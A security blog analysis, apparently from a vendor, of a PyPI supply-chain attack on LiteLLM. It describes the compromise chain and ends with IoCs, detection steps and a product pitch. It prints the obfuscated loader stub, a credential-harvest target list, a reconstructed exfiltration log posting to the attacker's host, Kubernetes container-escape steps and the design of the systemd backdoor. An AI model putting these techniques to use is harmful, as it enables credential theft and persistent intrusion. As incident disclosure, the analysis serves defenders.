Vitalii Rudnykh
Security Research

LiteLLM Supply Chain Attack: How 12 Lines of Code Compromised 95 Million Downloads

On March 24, 2026, TeamPCP published two malicious versions of LiteLLM to PyPI. Within three hours, a credential-stealing payload reached AI infrastructure across 36% of monitored cloud environments.


This Is Not an AI Vulnerability

Before we dive in: this attack has nothing to do with LLM prompt injection, model jailbreaks, or AI safety. It's a software supply chain attack — the same class of threat that hit SolarWinds, Codecov, and ua-parser-js. The target just happens to be AI infrastructure. The vulnerability is in how packages are built, signed, and delivered — not in the models themselves.

What Is LiteLLM?

LiteLLM is a Python library that lets you call 100+ LLM APIs through a single interface. In proxy mode, it becomes a centralized AI gateway handling API keys, load balancing, and spend tracking. It's a transitive dependency in CrewAI, DSPy, MLflow, and LangChain — most teams don't know they run it. A library that handles every API key in your AI stack, installed 95M times per month. A perfect target.

How It Happened

Trivy (Feb 28) → KICS (Mar 23) → LiteLLM (Mar 24)

TeamPCP didn't attack LiteLLM directly. Over the preceding month, they compromised two security scanners — Aqua Trivy and Checkmarx KICS — through misconfigured GitHub Actions, stealing CI/CD credentials at each step. Each compromise yielded tokens that unlocked the next target.

The final link: LiteLLM's CI pipeline ran apt-get install trivy without pinning a version. It pulled the already-poisoned Trivy v0.69.4, which harvested the PYPI_PUBLISH token — the key to publishing Python packages under the LiteLLM name.

The Injection: Two Techniques in 13 Minutes

Version 1.82.7 (published 10:39 UTC) took the straightforward approach: 12 lines of obfuscated code injected into litellm/proxy/proxy_server.py at lines 128–139. The payload used double-base64 encoding — a ~4KB encoded string that decoded to a temp file and executed via subprocess.run(). It triggered whenever the proxy module was imported — which happens on every litellm --proxy start:

# Lines 128-139 of proxy_server.py (v1.82.7)
import subprocess, sys, base64, tempfile
_enc = "aW1wb3J0IH..."  # double-base64 (~4KB decoded)
_dec = base64.b64decode(base64.b64decode(_enc))
with tempfile.NamedTemporaryFile(suffix='.py', delete=False) as f:
    f.write(_dec); f.flush()
    subprocess.run([sys.executable, f.name])

Version 1.82.8 (published 10:52 UTC — just 13 minutes later) escalated the attack. It kept the proxy_server.py injection but added a far more dangerous mechanism: a litellm_init.pth file included directly in the wheel package.

The .pth Mechanism: Why It's Devastating

Python's .pth files are normally used to extend sys.path, but any line starting with import is executed as code during interpreter initialization — before any user script runs. This means:

  • The malware fires on any python command — not just LiteLLM imports
  • It runs before if __name__ == "__main__" — no way to guard against it
  • The file was correctly declared in the wheel's RECORD file, so pip --require-hashes would have passed — the hash was valid because the malicious content was published with legitimate credentials
  • It persists across virtualenv recreation — as long as the package is installed, the .pth executes
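The quirk is easy to demonstrate with the standard library alone. site.addsitedir() applies the same .pth processing that runs at interpreter startup, so a benign sketch of the mechanism (file and variable names here are illustrative, not from the payload) looks like this:

```python
# Benign demo of the .pth execution quirk the malicious litellm_init.pth abused.
# Any line in a .pth file that begins with "import" is exec()'d as Python code.
import os
import site
import tempfile

tmp = tempfile.mkdtemp()
with open(os.path.join(tmp, "demo.pth"), "w") as f:
    # Not a path entry: this whole line is executed by the site machinery.
    f.write('import os; os.environ["PTH_RAN"] = "1"\n')

# Same processing the interpreter applies to site-packages at startup.
site.addsitedir(tmp)

print(os.environ.get("PTH_RAN"))  # -> "1"
```

In a real install the .pth sits in site-packages, so this fires on every interpreter launch — before any user code, guard, or framework hook runs.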

A critical bug: the .pth launcher spawned child processes via subprocess.Popen, which started new Python interpreters, which triggered the .pth again — creating an exponential fork bomb that crashed machines within seconds. This "bug in the malware" was likely the single biggest factor in accelerating detection, as affected systems became visibly unstable.

PyPI quarantined both versions at approximately 11:25 UTC — roughly three hours after the first publication. During that window, LiteLLM was averaging 3.4 million downloads per day.

The Payload

Stage 1: Credential Harvester

The first stage performed a comprehensive sweep of the host. It wasn't just reading files — it actively queried APIs to validate and expand the collected credentials:

  • SSH — id_rsa, id_ed25519, id_ecdsa, id_dsa, authorized_keys, config, known_hosts
  • AWS — ~/.aws/credentials, ~/.aws/config, IMDSv2 metadata (169.254.169.254/latest/meta-data/iam/security-credentials/), ECS task role credentials via $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
  • GCP — service account JSON files, application default credentials (~/.config/gcloud/), compute metadata tokens
  • Azure — managed identity tokens via 169.254.169.254/metadata/identity/oauth2/token
  • Kubernetes — ~/.kube/config, in-cluster service account tokens at /var/run/secrets/kubernetes.io/, enumerated and dumped secrets across all accessible namespaces
  • CI/CD — Terraform state files (often contain cloud credentials in plaintext), GitLab CI tokens, Jenkins credentials.xml, Travis CI tokens, .npmrc, .pypirc
  • Databases — .pgpass, my.cnf, Redis/MongoDB connection strings
  • Crypto wallets — Bitcoin (wallet.dat), Ethereum keystores, Solana keypairs
  • Application secrets — every .env file reachable from the user's home directory, .gitconfig, shell history (.bash_history, .zsh_history), Slack/Discord webhooks, Stripe API keys, SendGrid tokens
credential sweep — reconstructed from payload analysis
reading ~/.ssh/id_rsa
reading ~/.ssh/id_ed25519
reading ~/.aws/credentials
querying 169.254.169.254/meta-data/iam/
reading ~/.kube/config
dumping kubectl get secrets --all-namespaces
reading /app/.env
reading ~/.config/gcloud/credentials.db
reading ~/.bash_history
archiving tpcp.tar.gz (2.4MB)
encrypting AES-256-CBC → RSA-4096 envelope
POST models.litellm[.]cloud → 200 OK

Encryption Pipeline

The exfiltration wasn't naive. Collected data was encrypted using a multi-layer scheme:

  1. Generate random AES-256-CBC session key + IV
  2. Derive key material using PBKDF2
  3. Encrypt the archive with the session key
  4. Encrypt the session key with a hardcoded 4096-bit RSA public key (only the attacker holds the private key)
  5. Package as tpcp.tar.gz and POST to models.litellm[.]cloud with header X-Filename: tpcp.tar.gz

This means even if you captured the network traffic, you cannot decrypt the exfiltrated data without the attacker's RSA private key.

Stage 2: Kubernetes Lateral Movement

If Kubernetes service account tokens were found on the host, the malware escalated from credential theft to active cluster compromise:

  1. Read cluster secrets across all accessible namespaces via the K8s API
  2. Enumerated all nodes in the cluster
  3. For each node, deployed a privileged alpine:latest pod named node-setup-{node_name} in the kube-system namespace
  4. The pod mounted the host root filesystem at / via hostPath volume
  5. Inside the pod: chroot /host to escape the container, then installed the CanisterWorm backdoor directly on the node's filesystem
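A pod of the kind these steps describe would look roughly like this reconstruction — the name pattern, namespace, and image come from the report; every other field is an assumption:

```yaml
# Reconstruction (not the recovered manifest) of the privileged node pod.
apiVersion: v1
kind: Pod
metadata:
  name: node-setup-worker-1        # node-setup-{node_name}, per the report
  namespace: kube-system           # blends in with system workloads
spec:
  nodeName: worker-1               # pinned to the target node
  containers:
  - name: provisioner              # alternated with "kamikaze"
    image: alpine:latest
    securityContext:
      privileged: true
    # chroot into the mounted host filesystem to escape the container
    command: ["chroot", "/host", "/bin/sh", "-c", "..."]
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /                      # host root filesystem
```

With privileged: true and the host root mounted via hostPath, the chroot gives the payload unrestricted write access to the node — Kubernetes itself provides the lateral movement.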

Container names alternated between kamikaze and provisioner — the former used for destructive operations, the latter for persistence.

For hosts with Tehran timezone or Farsi language settings, the behavior changed entirely: instead of persisting, the malware deployed a wiper that destroyed Kubernetes cluster data. This targeted destructive capability against Iranian infrastructure suggests geopolitical motivation beyond pure financial gain.

Stage 3: Persistent Backdoor

The final stage ensured long-term access through a systemd user service — requiring no root privileges:

  • Wrote persistence script to ~/.config/sysmon/sysmon.py
  • Created systemd user unit at ~/.config/systemd/user/sysmon.service, labeled "System Telemetry Service" to blend in with legitimate monitoring
  • Initial 300-second sleep before first activation (evade sandbox analysis)
  • Polled checkmarx[.]zone/raw every ~50 minutes for payload URLs
  • Downloaded payloads to /tmp/pglog, executed in detached sessions via setsid
  • Tracked beacon state in /tmp/.pg_state to avoid redundant downloads
  • Filtered YouTube links as a kill-switch — if the C2 returned a YouTube URL, the payload was skipped (allowing the attacker to "pause" operations)
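The user unit itself would look something like this reconstruction — only the path, unit name, and description label come from the report; the remaining directives are assumed:

```ini
# ~/.config/systemd/user/sysmon.service (reconstruction, not the recovered file)
[Unit]
Description=System Telemetry Service

[Service]
ExecStart=/usr/bin/python3 %h/.config/sysmon/sysmon.py
Restart=always

[Install]
WantedBy=default.target
```

Because it is a user unit, no root privileges are needed to install or enable it, and it starts on every login session.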

This persistence survived reboots, pip uninstall litellm, and virtual environment recreation. The only remediation was finding and deleting the sysmon files manually, or rebuilding from a clean image.

When Sonatype researchers attempted to retrieve the C2 payload during analysis, the endpoint returned a link to an English remaster of "Bad Apple!!" — a deliberate troll that also defeated automated sandbox analysis.

Suppression & Impact

When security researchers filed GitHub issue #24512 reporting the compromise, TeamPCP used the stolen maintainer account to close it as "not planned" — making it appear the legitimate maintainers had dismissed the report. The issue was simultaneously flooded with bot comments from accounts matching botnets previously observed during the Trivy disclosure, burying legitimate analysis under noise.

The attack's C2 domain — models.litellm[.]cloud — was deliberately chosen to mimic legitimate LiteLLM infrastructure, making network-level detection harder for defenders scanning for suspicious domains.

Across the full campaign (Trivy → npm → KICS → LiteLLM), TeamPCP claimed to have "stolen hundreds of gigabytes of data and more than half a million accounts." Over 20,000 repositories were considered potentially vulnerable. LiteLLM itself was present in 36% of monitored cloud environments according to Wiz research.

IoCs & Forensics

| Type | Indicator | Context |
|------|-----------|---------|
| PyPI | litellm==1.82.7 | proxy_server.py injection |
| PyPI | litellm==1.82.8 | + .pth persistence |
| SHA-256 | a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b | proxy_server.py (v1.82.7) |
| SHA-256 | 71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 | litellm_init.pth (v1.82.8) |
| SHA-256 | 6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a | sysmon.py (backdoor) |
| C2 | models.litellm[.]cloud | Exfiltration |
| C2 | checkmarx[.]zone | Backdoor polling |
| IP | 45.148.10.212 | aquasecurtiy[.]org |
| IP | 83.142.209.11 | checkmarx[.]zone |
| File | ~/.config/sysmon/sysmon.py | Persistence |
| Systemd | ~/.config/systemd/user/sysmon.service | User service |
| K8s | node-setup-{name} | kube-system pods |
| Archive | tpcp.tar.gz | Exfil bundle |

Detection & Remediation

If you installed LiteLLM between Mar 24 10:39 and 11:25 UTC, assume full credential exposure.

  • Check version: pip show litellm | grep Version
  • Find .pth: find "$(python -c 'import site;print(site.getsitepackages()[0])')" -name "litellm_init.pth"
  • Check persistence: ls ~/.config/sysmon/ ~/.config/systemd/user/sysmon.service
  • Audit K8s: kubectl get pods -n kube-system | grep node-setup
  • Rotate ALL credentials from affected environment
  • Rebuild from clean image — persistence survives pip uninstall
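The manual checks above can be folded into a single sweep. A hedged sketch — the paths come from the published IoCs, everything else is illustrative:

```python
# One-pass audit for the published LiteLLM IoCs (sketch; adapt per environment).
import importlib.metadata as md
import site
from pathlib import Path

BAD_VERSIONS = {"1.82.7", "1.82.8"}
findings = []

# 1. Is a known-bad LiteLLM version installed?
try:
    ver = md.version("litellm")
    if ver in BAD_VERSIONS:
        findings.append(f"malicious litellm {ver} installed")
except md.PackageNotFoundError:
    pass  # litellm not installed in this environment

# 2. Rogue .pth dropped by v1.82.8
for sp in site.getsitepackages() + [site.getusersitepackages()]:
    pth = Path(sp) / "litellm_init.pth"
    if pth.exists():
        findings.append(f"rogue .pth: {pth}")

# 3. Backdoor persistence artifacts
home = Path.home()
for p in (home / ".config/sysmon/sysmon.py",
          home / ".config/systemd/user/sysmon.service"):
    if p.exists():
        findings.append(f"persistence file: {p}")

print(findings or "no known indicators found")
```

Remember that a clean result from this script is not a clean bill of health — the .pth stage could have pulled arbitrary second-stage payloads, so credential rotation and a rebuild from a clean image are still required for any host that held an affected version.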

How Imunify for AI Agents Stops This

Once a package is installed, nothing inspects what it does at runtime. Imunify for AI Agents fills this gap with kernel-level interception — eBPF hooks, fanotify, transparent HTTP proxy.

The Kill Chain — Every Stage Blocked

  • Step 1 — Read credentials: file access frozen; policy denies the read; secret patterns detected in content.
  • Step 2 — Encrypt & archive: nothing to encrypt — all reads were denied.
  • Step 3 — Send to attacker: network connection denied at the kernel level; data never leaves the machine.
  • Step 4 — Install backdoor: writes to system directories denied; persistence never installed.

All four stages neutralized — process killed by Imunify for AI Agents.

Instant Discovery (eBPF)

When LiteLLM starts, a kernel-level sched_process_exec hook detects it instantly — PID tracked before the process runs its first instruction. No polling, no delay.

File Read Blocking (Fanotify)

Every file LiteLLM opens is intercepted — the process is frozen in the kernel until policy decides. The compromised version's attempt to sweep credentials from .env, SSH keys, and cloud configs is denied on each read. A content scanner with 200+ secret patterns catches credentials even in unexpected file paths.

Network Correlation (Rules)

Cross-event correlation rules catch the exact pattern this attack uses: if LiteLLM (or any tracked process) reads .env files and then attempts an outbound HTTP connection, the connection is automatically blocked — no human decision needed. Unknown destinations require explicit approval via Telegram, Discord, or Web UI before any data leaves the machine.

Behavioral Kill (Automatic)

When the compromised LiteLLM triggers a rapid burst of blocked file reads — the exact pattern of a credential harvester scanning the filesystem — Imunify for AI Agents automatically kills the process. No human intervention. The attack dies before it finishes its first sweep.

Imunify for AI Agents Blocking the LiteLLM Attack in Real Time

Conclusion

Supply chain attacks cascade. One misconfigured GitHub Action → credential theft → npm → KICS → PyPI. Incomplete remediation at each step left doors open.

Build-time security is necessary but insufficient. Signatures and hashes don't help when a compromised version is published with valid credentials. Runtime interception watches what code does, not where it came from.

Twelve lines. Three hours. Ninety-five million downloads. The next attack won't look like this one — but the syscalls will be the same.